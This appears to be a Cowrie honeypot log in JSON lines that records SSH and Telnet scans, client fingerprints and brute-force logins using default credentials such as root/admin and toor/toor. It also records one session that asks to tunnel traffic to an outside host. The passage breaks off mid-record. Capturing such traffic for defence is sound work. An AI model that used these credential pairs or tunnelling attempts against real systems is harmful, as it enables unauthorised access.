{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:27:51.196532Z","src_ip":"154.209.4.55","session":"04b93fac22ef"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:27:52.271731Z","src_ip":"192.210.135.20","session":"a71ace3d4fd8"}
{"eventid":"cowrie.session.connect","src_ip":"205.210.31.234","src_port":58884,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa1148e177e6","protocol":"ssh","message":"New connection: 205.210.31.234:58884 (1.2.3.4:22) [session: aa1148e177e6]","sensor":"my-vps","timestamp":"2025-09-09T04:27:57.632926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-09-09T04:27:58.362294Z","src_ip":"205.210.31.234","session":"aa1148e177e6"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-09-09T04:27:59.421734Z","src_ip":"205.210.31.234","session":"aa1148e177e6"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:28:06.130414Z","src_ip":"205.210.31.234","session":"aa1148e177e6"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":49920,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad55c0280e32","protocol":"ssh","message":"New connection: 102.68.86.62:49920 (1.2.3.4:22) [session: ad55c0280e32]","sensor":"my-vps","timestamp":"2025-09-09T04:28:07.150589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:28:07.151424Z","src_ip":"102.68.86.62","session":"ad55c0280e32"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:28:07.321568Z","src_ip":"102.68.86.62","session":"ad55c0280e32"}
{"eventid":"cowrie.login.failed","username":"config","password":"1234","message":"login attempt [config/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:28:08.035868Z","src_ip":"102.68.86.62","session":"ad55c0280e32"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:28:09.225295Z","src_ip":"102.68.86.62","session":"ad55c0280e32"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34179,"dst_ip":"1.2.3.4","dst_port":22,"session":"38aaf17a0110","protocol":"ssh","message":"New connection: 212.227.125.160:34179 (1.2.3.4:22) [session: 38aaf17a0110]","sensor":"my-vps","timestamp":"2025-09-09T04:28:35.014182Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:28:35.015143Z","src_ip":"212.227.125.160","session":"38aaf17a0110"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34427,"dst_ip":"1.2.3.4","dst_port":22,"session":"f967bd12116f","protocol":"ssh","message":"New connection: 212.227.125.160:34427 (1.2.3.4:22) [session: f967bd12116f]","sensor":"my-vps","timestamp":"2025-09-09T04:28:35.125432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:28:35.126330Z","src_ip":"212.227.125.160","session":"f967bd12116f"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T04:28:35.238559Z","src_ip":"212.227.125.160","session":"f967bd12116f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:28:35.576529Z","src_ip":"212.227.125.160","session":"f967bd12116f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T04:28:35.690762Z","session":"f967bd12116f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52360,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b5c6980c121","protocol":"telnet","message":"New connection: 212.227.235.229:52360 (1.2.3.4:23) [session: 3b5c6980c121]","sensor":"my-vps","timestamp":"2025-09-09T04:28:48.133534Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:28:48.348920Z","src_ip":"212.227.235.229","session":"3b5c6980c121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:28:48.405128Z","src_ip":"212.227.235.229","session":"3b5c6980c121"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T04:28:48.406195Z","src_ip":"212.227.235.229","session":"3b5c6980c121"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T04:28:48.406934Z","src_ip":"212.227.235.229","session":"3b5c6980c121"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:28:49.865997Z","src_ip":"111.180.193.159","session":"e2b8c0688708"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":55604,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a079f68e4d5","protocol":"ssh","message":"New connection: 192.210.135.20:55604 (1.2.3.4:22) [session: 4a079f68e4d5]","sensor":"my-vps","timestamp":"2025-09-09T04:28:57.049776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:28:57.050683Z","src_ip":"192.210.135.20","session":"4a079f68e4d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:28:57.170476Z","src_ip":"192.210.135.20","session":"4a079f68e4d5"}
{"eventid":"cowrie.login.failed","username":"z","password":"Welcome1","message":"login attempt [z/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:28:57.686952Z","src_ip":"192.210.135.20","session":"4a079f68e4d5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:28:58.808094Z","src_ip":"192.210.135.20","session":"4a079f68e4d5"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":52608,"dst_ip":"1.2.3.4","dst_port":22,"session":"a31dc2ee8d79","protocol":"ssh","message":"New connection: 103.59.95.12:52608 (1.2.3.4:22) [session: a31dc2ee8d79]","sensor":"my-vps","timestamp":"2025-09-09T04:29:00.187131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:29:00.187962Z","src_ip":"103.59.95.12","session":"a31dc2ee8d79"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:29:00.451645Z","src_ip":"103.59.95.12","session":"a31dc2ee8d79"}
{"eventid":"cowrie.login.failed","username":"toor","password":"toor","message":"login attempt [toor/toor] failed","sensor":"my-vps","timestamp":"2025-09-09T04:29:01.553104Z","src_ip":"103.59.95.12","session":"a31dc2ee8d79"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:29:02.818843Z","src_ip":"103.59.95.12","session":"a31dc2ee8d79"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.20","src_port":65105,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0447abe73e1","protocol":"ssh","message":"New connection: 194.0.234.20:65105 (1.2.3.4:22) [session: c0447abe73e1]","sensor":"my-vps","timestamp":"2025-09-09T04:29:05.542101Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:29:05.557636Z","src_ip":"194.0.234.20","session":"c0447abe73e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33988,"dst_ip":"1.2.3.4","dst_port":23,"session":"0dcbdef7658c","protocol":"telnet","message":"New connection: 212.227.125.160:33988 (1.2.3.4:23) [session: 0dcbdef7658c]","sensor":"my-vps","timestamp":"2025-09-09T04:29:05.689191Z"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":43315,"dst_ip":"1.2.3.4","dst_port":22,"session":"d14dd26c6c24","protocol":"ssh","message":"New connection: 154.209.4.55:43315 (1.2.3.4:22) [session: d14dd26c6c24]","sensor":"my-vps","timestamp":"2025-09-09T04:29:14.214912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:29:14.218092Z","src_ip":"154.209.4.55","session":"d14dd26c6c24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:29:14.417578Z","src_ip":"154.209.4.55","session":"d14dd26c6c24"}
{"eventid":"cowrie.login.failed","username":"toor","password":"toor","message":"login attempt [toor/toor] failed","sensor":"my-vps","timestamp":"2025-09-09T04:29:15.219972Z","src_ip":"154.209.4.55","session":"d14dd26c6c24"}
{"eventid":"cowrie.session.closed","duration":10.147202968597412,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:29:15.836285Z","src_ip":"212.227.125.160","session":"0dcbdef7658c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36406,"dst_ip":"1.2.3.4","dst_port":23,"session":"c1f2dca20fd0","protocol":"telnet","message":"New connection: 212.227.125.160:36406 (1.2.3.4:23) [session: c1f2dca20fd0]","sensor":"my-vps","timestamp":"2025-09-09T04:29:15.977512Z"}
{"eventid":"cowrie.session.closed","duration":0.1518387794494629,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:29:16.129262Z","src_ip":"212.227.125.160","session":"c1f2dca20fd0"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:29:16.423165Z","src_ip":"154.209.4.55","session":"d14dd26c6c24"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:29:45.126359Z","src_ip":"212.227.125.160","session":"f967bd12116f"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":58210,"dst_ip":"1.2.3.4","dst_port":22,"session":"64e9fa1ff874","protocol":"ssh","message":"New connection: 192.210.135.20:58210 (1.2.3.4:22) [session: 64e9fa1ff874]","sensor":"my-vps","timestamp":"2025-09-09T04:29:57.659252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:29:57.661046Z","src_ip":"192.210.135.20","session":"64e9fa1ff874"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:29:57.770512Z","src_ip":"192.210.135.20","session":"64e9fa1ff874"}
{"eventid":"cowrie.login.failed","username":"hz","password":"123456","message":"login attempt [hz/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T04:29:58.247678Z","src_ip":"192.210.135.20","session":"64e9fa1ff874"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:29:59.360289Z","src_ip":"192.210.135.20","session":"64e9fa1ff874"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":56121,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a997453bfdd","protocol":"ssh","message":"New connection: 154.209.4.55:56121 (1.2.3.4:22) [session: 2a997453bfdd]","sensor":"my-vps","timestamp":"2025-09-09T04:30:23.153844Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:30:23.160424Z","src_ip":"154.209.4.55","session":"2a997453bfdd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:30:23.371973Z","src_ip":"154.209.4.55","session":"2a997453bfdd"}
{"eventid":"cowrie.login.failed","username":"redis","password":"1234","message":"login attempt [redis/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:30:24.227100Z","src_ip":"154.209.4.55","session":"2a997453bfdd"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:30:25.450242Z","src_ip":"154.209.4.55","session":"2a997453bfdd"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":59476,"dst_ip":"1.2.3.4","dst_port":22,"session":"135adf46f97e","protocol":"ssh","message":"New connection: 103.59.95.12:59476 (1.2.3.4:22) [session: 135adf46f97e]","sensor":"my-vps","timestamp":"2025-09-09T04:30:27.052694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:30:27.054066Z","src_ip":"103.59.95.12","session":"135adf46f97e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","h